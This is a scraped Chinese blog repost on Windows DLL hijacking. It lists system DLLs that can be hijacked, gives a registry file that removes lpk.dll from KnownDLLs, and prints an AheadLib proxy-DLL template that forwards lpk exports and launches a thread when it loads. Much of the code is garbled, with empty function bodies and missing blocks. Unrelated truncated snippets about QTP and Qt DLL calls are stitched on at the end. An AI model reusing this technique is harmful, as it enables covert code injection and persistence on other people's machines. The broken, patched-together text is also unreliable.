先轉一篇文章:
1.dll劫持,粗略整理了下,可以劫持的dll有(持續更新):
lpk.dll、usp10.dll、msimg32.dll、midimap.dll、ksuser.dll、comres.dll、ddraw.dll
以lpk為例,在win7下由於lpk被加入knowndlls且該登錄檔值不可修改(擁有者是trustedinstaller),使得lpk強制從系統目錄載入,
不過可以將lpk.dll加入excludefromknowndlls來解決,具體可以建立乙個lpk.reg檔案:
windows registry editor version 5.00
[hkey_local_machine\system\currentcontrolset\control\session manager]
"excludefromknowndlls"=hex(7):6c,00,70,00,6b,00,2e,00,64,00,6c,00,6c,00,00,00,00,00
成功匯入後需要重新啟動電腦才能生效。
參考:另外win7下的lpk在編寫方面需要注意:
win7有的程式呼叫lpk.dll的lpkinitialize輸出函式在lpk的初始化前面.(自己注:為了相容,也可以在所有函式都判斷下是否載入)
要在lpkinitialize這個函式中加入一些處理,並且這部分**不能加密.
因此為了相容各個系統,可以在dllmain和lpkinitialize裡均做判斷,如果沒有初始化就進行初始化。#include
// 匯出函式
#pragma comment(linker, "/export:lpkinitialize=_aheadlib_lpkinitialize,@1")
#pragma comment(linker, "/export:lpktabbedtextout=_aheadlib_lpktabbedtextout,@2")
#pragma comment(linker, "/export:lpkdllinitialize=_aheadlib_lpkdllinitialize,@3")
#pragma comment(linker, "/export:lpkdrawtextex=_aheadlib_lpkdrawtextex,@4")
//#pragma comment(linker, "/export:lpkeditcontrol=_aheadlib_lpkeditcontrol,@5")
#pragma comment(linker, "/export:lpkexttextout=_aheadlib_lpkexttextout,@6")
#pragma comment(linker, "/export:lpkgetcharacterplacement=_aheadlib_lpkgetcharacterplacement,@7")
#pragma comment(linker, "/export:lpkgettextextentexpoint=_aheadlib_lpkgettextextentexpoint,@8")
#pragma comment(linker, "/export:lpkpsmtextout=_aheadlib_lpkpsmtextout,@9")
#pragma comment(linker, "/export:lpkusegdiwidthcache=_aheadlib_lpkusegdiwidthcache,@10")
#pragma comment(linker, "/export:ftswordbreak=_aheadlib_ftswordbreak,@11")
// 巨集定義
#define externc extern "c"
#define naked __declspec(naked)
#define export __declspec(dllexport)
#define alcpp export naked
#define alstd externc export naked void __stdcall
#define alcfast externc export naked void __fastcall
#define alcdecl externc naked void __cdecl
//lpkeditcontrol匯出的是陣列,不是單一的函式(by backer)
externc void __cdecl aheadlib_lpkeditcontrol(void);
externc __declspec(dllexport) void (*lpkeditcontrol[14])() = ;
//新增全域性變數
bool g_binited = false;
// aheadlib 命名空間
namespace aheadlib
;return (m_hmodule != null);
}// 釋放原始模組
void winapi free()
}// 獲取原始函式位址
farproc winapi getaddress(pcstr pszprocname)
wsprintf(tztemp, text("無法找到函式 %hs,程式無法正常執行。"), pszprocname);
messagebox(null, tztemp, text("aheadlib"), mb_iconstop);
exitprocess(-2);
}return fpaddress;}}
using namespace aheadlib;
//函式宣告
void winapiv init(lpvoid pparam);
void winapiv init(lpvoid pparam)
// 入口函式
bool winapi dllmain(hmodule hmodule, dword dwreason, pvoid pvreserved)
//lpkeditcontrol這個陣列有14個成員,必須將其複製過來
memcpy((lpvoid)(lpkeditcontrol+1), (lpvoid)((int*)getaddress("lpkeditcontrol") + 1),52);
_beginthread(init,null,null);
}else if (dwreason == dll_process_detach)
return true;
}// 匯出函式
alcdecl aheadlib_lpkinitialize(void)
getaddress("lpkinitialize");
__asm jmp eax;
}
// 匯出函式
alcdecl aheadlib_lpktabbedtextout(void)
// 匯出函式
alcdecl aheadlib_lpkdllinitialize(void)
// 匯出函式
alcdecl aheadlib_lpkdrawtextex(void)
// 匯出函式
alcdecl aheadlib_lpkeditcontrol(void)
// 匯出函式
alcdecl aheadlib_lpkexttextout(void)
// 匯出函式
alcdecl aheadlib_lpkgetcharacterplacement(void)
// 匯出函式
alcdecl aheadlib_lpkgettextextentexpoint(void)
// 匯出函式
alcdecl aheadlib_lpkpsmtextout(void)
// 匯出函式
alcdecl aheadlib_lpkusegdiwidthcache(void)
// 匯出函式
alcdecl aheadlib_ftswordbreak(void)
QTP引用外部dll的3種方法
1 active dll 通過createobject class 建立 dim ws set ws createobject wscript.shell ws.run notepad.exe getobject pathname class 引數pathname 可選項。字串,包含待檢索物件的檔案...
QTP引用外部dll的3種方法
1 active dll 通過createobject class 建立 dim ws set ws createobject wscript.shell ws.run notepad.exe getobject pathname class 引數pathname 可選項。字串,包含待檢索物件的檔案...
QT 呼叫 DLL 的三種方法
qt呼叫dll方法一 使用win32 api 件typedef bool callback setkeyboardhook hwnd hinstance hdll handle to dll setkeyboardhook lpfndllfunc1 function pointer cpp檔案 vo...